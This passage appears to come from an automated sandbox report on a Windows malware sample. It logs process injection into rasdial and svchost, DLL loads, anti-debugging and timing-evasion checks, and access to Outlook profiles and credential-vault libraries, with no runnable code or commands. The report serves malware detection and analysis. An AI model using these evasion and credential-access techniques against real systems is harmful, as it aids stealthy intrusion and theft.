            Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe Process created: C:\Windows\SysWOW64\rasdial.exe "C:\Windows\SysWOW64\rasdial.exe"
            Source: C:\Windows\SysWOW64\rasdial.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\220204-TF1--00.exe Section loaded: wsock32.dll
            Source: C:\Users\user\Desktop\220204-TF1--00.exe Section loaded: version.dll
            Source: C:\Users\user\Desktop\220204-TF1--00.exe Section loaded: winmm.dll
            Source: C:\Users\user\Desktop\220204-TF1--00.exe Section loaded: mpr.dll
            Source: C:\Users\user\Desktop\220204-TF1--00.exe Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\220204-TF1--00.exe Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\220204-TF1--00.exe Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\220204-TF1--00.exe Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\220204-TF1--00.exe Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\220204-TF1--00.exe Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\220204-TF1--00.exe Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\220204-TF1--00.exe Section loaded: ntmarta.dll
            Source: C:\Users\user\Desktop\220204-TF1--00.exe Section loaded: scrrun.dll
            Source: C:\Users\user\Desktop\220204-TF1--00.exe Section loaded: sxs.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: rasapi32.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: rasman.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: version.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: mlang.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: cryptbase.dll
            Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe Section loaded: wininet.dll
            Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe Section loaded: mswsock.dll
            Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe Section loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe Section loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe Section loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\220204-TF1--00.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}\InprocServer32
            Source: C:\Windows\SysWOW64\rasdial.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: 220204-TF1--00.exe Static file information: File size 1191424 > 1048576
            Source: 220204-TF1--00.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: 220204-TF1--00.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: 220204-TF1--00.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: 220204-TF1--00.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: 220204-TF1--00.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: 220204-TF1--00.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: sXIYDUFnJY.exe, 00000005.00000002.4130102860.0000000000D3E000.00000002.00000001.01000000.00000005.sdmp, sXIYDUFnJY.exe, 00000007.00000000.2098859139.0000000000D3E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: 220204-TF1--00.exe, 00000000.00000003.1672930052.0000000003730000.00000004.00001000.00020000.00000000.sdmp, 220204-TF1--00.exe, 00000000.00000003.1673498138.00000000038D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2032818323.0000000003500000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1933247119.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2032818323.000000000369E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1935399769.0000000003300000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.4130949319.0000000004EF0000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.2032919172.0000000004B99000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.4130949319.000000000508E000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.2035166513.0000000004D4A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: rasdial.pdb source: svchost.exe, 00000001.00000002.2032674414.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2001240762.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, sXIYDUFnJY.exe, 00000005.00000002.4129769188.0000000000838000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: 220204-TF1--00.exe, 00000000.00000003.1672930052.0000000003730000.00000004.00001000.00020000.00000000.sdmp, 220204-TF1--00.exe, 00000000.00000003.1673498138.00000000038D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.2032818323.0000000003500000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1933247119.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2032818323.000000000369E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1935399769.0000000003300000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, rasdial.exe, 00000006.00000002.4130949319.0000000004EF0000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.2032919172.0000000004B99000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.4130949319.000000000508E000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.2035166513.0000000004D4A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: rasdial.pdbGCTL source: svchost.exe, 00000001.00000002.2032674414.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2001240762.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, sXIYDUFnJY.exe, 00000005.00000002.4129769188.0000000000838000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: rasdial.exe, 00000006.00000002.4129935953.0000000003149000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.4131381557.000000000551C000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000000.2099009703.000000000278C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2317942317.00000000313EC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: rasdial.exe, 00000006.00000002.4129935953.0000000003149000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.4131381557.000000000551C000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000000.2099009703.000000000278C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2317942317.00000000313EC000.00000004.80000000.00040000.00000000.sdmp
            Source: 220204-TF1--00.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: 220204-TF1--00.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: 220204-TF1--00.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: 220204-TF1--00.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: 220204-TF1--00.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\220204-TF1--00.exe Code function: 0_2_006FC304 LoadLibraryA,GetProcAddress
            Source: C:\Users\user\Desktop\220204-TF1--00.exe Code function: 0_2_006E8719 push FFFFFF8Bh; iretd 0_2_006E871B
            Source: C:\Users\user\Desktop\220204-TF1--00.exe Code function: 0_2_006AE94F push edi; ret 0_2_006AE951
            Source: C:\Users\user\Desktop\220204-TF1--00.exe Code function: 0_2_006AEA68 push esi; ret 0_2_006AEA6A
            Source: C:\Users\user\Desktop\220204-TF1--00.exe Code function: 0_2_006A8B85 push ecx; ret 0_2_006A8B98
            Source: C:\Users\user\Desktop\220204-TF1--00.exe Code function: 0_2_006AEC43 push esi; ret 0_2_006AEC45
            Source: C:\Users\user\Desktop\220204-TF1--00.exe Code function: 0_2_006AED2C push edi; ret 0_2_006AED2E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00414833 push ss; retf 1_2_00414842
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0041389F push FFFFFFA4h; ret 1_2_004138AD
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00412100 push edi; iretd 1_2_00412101
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00403110 push eax; ret 1_2_00403112
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0040A987 push ebp; ret 1_2_0040A99B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00417CE3 push eax; ret 1_2_00417CE4
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00413FF7 push ss; retf 1_2_0041403C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00417FAD push esp; iretd 1_2_00417FB3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0350225F pushad ; ret 1_2_035027F9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035027FA pushad ; ret 1_2_035027F9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035309AD push ecx; mov dword ptr [esp], ecx 1_2_035309B6
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0350283D push eax; iretd 1_2_03502858
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0350135E push eax; iretd 1_2_03501369
            Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe Code function: 5_2_030B2B04 push FFFFFFA4h; ret 5_2_030B2B12
            Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe Code function: 5_2_030B1365 push edi; iretd 5_2_030B1366
            Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe Code function: 5_2_030A9BF7 push ebp; ret 5_2_030A9C00
            Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe Code function: 5_2_030B7212 push esp; iretd 5_2_030B7218
            Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe Code function: 5_2_030B3A98 push ss; retf 5_2_030B3AA7
            Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe Code function: 5_2_030B6F48 push eax; ret 5_2_030B6F49
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04EF27FA pushad ; ret 6_2_04EF27F9
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04EF225F pushad ; ret 6_2_04EF27F9
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04EF283D push eax; iretd 6_2_04EF2858
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_04F209AD push ecx; mov dword ptr [esp], ecx 6_2_04F209B6
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_02F1078C push FFFFFFA4h; ret 6_2_02F1079A
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_02F14BD0 push eax; ret 6_2_02F14BD1
            Source: C:\Users\user\Desktop\220204-TF1--00.exe Code function: 0_2_00684A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
            Source: C:\Users\user\Desktop\220204-TF1--00.exe Code function: 0_2_007055FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed
            Source: C:\Users\user\Desktop\220204-TF1--00.exe Code function: 0_2_006A33C7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
            Source: C:\Users\user\Desktop\220204-TF1--00.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rasdial.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\220204-TF1--00.exe API/Special instruction interceptor: Address: 3683234
            Source: C:\Windows\SysWOW64\rasdial.exe API/Special instruction interceptor: Address: 7FFE2220D324
            Source: C:\Windows\SysWOW64\rasdial.exe API/Special instruction interceptor: Address: 7FFE2220D7E4
            Source: C:\Windows\SysWOW64\rasdial.exe API/Special instruction interceptor: Address: 7FFE2220D944
            Source: C:\Windows\SysWOW64\rasdial.exe API/Special instruction interceptor: Address: 7FFE2220D504
            Source: C:\Windows\SysWOW64\rasdial.exe API/Special instruction interceptor: Address: 7FFE2220D544
            Source: C:\Windows\SysWOW64\rasdial.exe API/Special instruction interceptor: Address: 7FFE2220D1E4
            Source: C:\Windows\SysWOW64\rasdial.exe API/Special instruction interceptor: Address: 7FFE22210154
            Source: C:\Windows\SysWOW64\rasdial.exe API/Special instruction interceptor: Address: 7FFE2220DA44
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0357096E rdtsc
            Source: C:\Windows\SysWOW64\rasdial.exe Window / User API: threadDelayed 2748
            Source: C:\Windows\SysWOW64\rasdial.exe Window / User API: threadDelayed 7224
            Source: C:\Users\user\Desktop\220204-TF1--00.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
            Source: C:\Users\user\Desktop\220204-TF1--00.exe API coverage: 5.0 %
            Source: C:\Windows\SysWOW64\svchost.exe API coverage: 0.7 %
            Source: C:\Windows\SysWOW64\rasdial.exe API coverage: 2.6 %
            Source: C:\Windows\SysWOW64\rasdial.exe TID: 8076 Thread sleep count: 2748 > 30
            Source: C:\Windows\SysWOW64\rasdial.exe TID: 8076 Thread sleep time: -5496000s >= -30000s
            Source: C:\Windows\SysWOW64\rasdial.exe TID: 8076 Thread sleep count: 7224 > 30
            Source: C:\Windows\SysWOW64\rasdial.exe TID: 8076 Thread sleep time: -14448000s >= -30000s
            Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe TID: 8088 Thread sleep time: -85000s >= -30000s
            Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe TID: 8088 Thread sleep count: 36 > 30
            Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe TID: 8088 Thread sleep time: -54000s >= -30000s
            Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe TID: 8088 Thread sleep count: 42 > 30
            Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe TID: 8088 Thread sleep time: -42000s >= -30000s
            Source: C:\Windows\SysWOW64\rasdial.exe Last function: Thread delayed
            Source: C:\Users\user\Desktop\220204-TF1--00.exe Code function: 0_2_006E4696 GetFileAttributesW,FindFirstFileW,FindClose
            Source: C:\Users\user\Desktop\220204-TF1--00.exe Code function: 0_2_006EC93C FindFirstFileW,FindClose
            Source: C:\Users\user\Desktop\220204-TF1--00.exe Code function: 0_2_006EC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
            Source: C:\Users\user\Desktop\220204-TF1--00.exe Code function: 0_2_006EF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
            Source: C:\Users\user\Desktop\220204-TF1--00.exe Code function: 0_2_006EF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
            Source: C:\Users\user\Desktop\220204-TF1--00.exe Code function: 0_2_006EF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose
            Source: C:\Users\user\Desktop\220204-TF1--00.exe Code function: 0_2_006E3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
            Source: C:\Users\user\Desktop\220204-TF1--00.exe Code function: 0_2_006E3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
            Source: C:\Users\user\Desktop\220204-TF1--00.exe Code function: 0_2_006EBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: 6_2_02F1C420 FindFirstFileW,FindNextFileW,FindClose
            Source: C:\Users\user\Desktop\220204-TF1--00.exe Code function: 0_2_00684AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo
            Source: sXIYDUFnJY.exe, 00000007.00000002.4130231715.00000000007FF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllk
            Source: rasdial.exe, 00000006.00000002.4129935953.0000000003149000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: firefox.exe, 00000009.00000002.2321622464.0000021A7143C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllII
            Source: C:\Users\user\Desktop\220204-TF1--00.exe API call chain: ExitProcess graph end node
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0357096E rdtsc 1_2_0357096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004174F3 LdrLoadDll,1_2_004174F3
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_006F41FD BlockInput,0_2_006F41FD
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_00683B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00683B4C
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_006B5CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_006B5CCC
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_006FC304 LoadLibraryA,GetProcAddress,0_2_006FC304
            Source: C:\Users\user\Desktop\220204-TF1--00.exe | Code function: 0_2_03683500 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\220204-TF1--00.exe | Code function: 0_2_036834A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\220204-TF1--00.exe | Code function: 0_2_03681E70 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035B035C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035B035C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035B035C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035B035C mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035B035C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035B035C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035FA352 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035D8350 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035B2349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035B2349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035B2349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035B2349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035B2349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035B2349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035B2349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035B2349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035B2349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035B2349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035B2349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035B2349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035B2349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035B2349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035B2349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035D437C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0360634F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0352C310 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03608324 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03608324 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03608324 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03608324 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03550310 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0356A30B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0356A30B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0356A30B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035DE3DB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035DE3DB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035DE3DB mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035DE3DB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035D43D4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035D43D4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035EC3CD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0353A3C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0353A3C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0353A3C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0353A3C0 mov eax, dword ptr fs:[00000030h]
